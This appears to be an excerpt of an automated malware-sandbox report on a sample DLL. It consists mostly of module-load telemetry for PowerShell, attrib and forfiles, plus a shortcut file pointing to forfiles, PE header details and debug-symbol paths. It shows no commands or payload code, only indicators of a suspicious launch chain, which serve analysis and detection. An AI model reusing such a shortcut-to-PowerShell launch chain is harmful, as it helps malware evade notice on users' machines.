Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.6.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: HQsitBLlOv.dllStatic PE information: Image base 0x180000000 > 0x60000000
Source: HQsitBLlOv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: HQsitBLlOv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: HQsitBLlOv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: HQsitBLlOv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: HQsitBLlOv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: HQsitBLlOv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: HQsitBLlOv.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: HQsitBLlOv.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbHF source: powershell.exe, 00000006.00000002.3080286160.00000276F9F8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 364e35\System.Management.Automation.pdbT source: powershell.exe, 0000000D.00000002.2517245546.00000278B4515000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4Gm source: powershell.exe, 00000006.00000002.3080286160.00000276F9F8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbh source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3056953361.00000242CC694000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb6 source: powershell.exe, 00000006.00000002.2996314232.00000276F7C08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbR source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb^ source: powershell.exe, 00000007.00000002.3027895006.000002271A196000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbz* source: powershell.exe, 00000008.00000002.3043110915.00000242CC60D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdb source: powershell.exe, 00000018.00000002.3196743622.00000223CF913000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb# source: powershell.exe, 00000018.00000002.3188775271.00000223CF58E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2517245546.00000278B4515000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbX source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automationib.pdb source: powershell.exe, 00000008.00000002.2572094402.00000242B23BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdbs source: powershell.exe, 00000008.00000002.2572094402.00000242B2414000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C85000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3196743622.00000223CF87E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32x source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ib.pdb source: powershell.exe, 00000007.00000002.3011907494.000002271A12A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb91? source: powershell.exe, 00000008.00000002.3009488482.00000242CC320000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdbe source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89 source: powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: HQsitBLlOv.dll
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbI3 source: powershell.exe, 0000000D.00000002.2518172369.00000278B45AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb_` source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
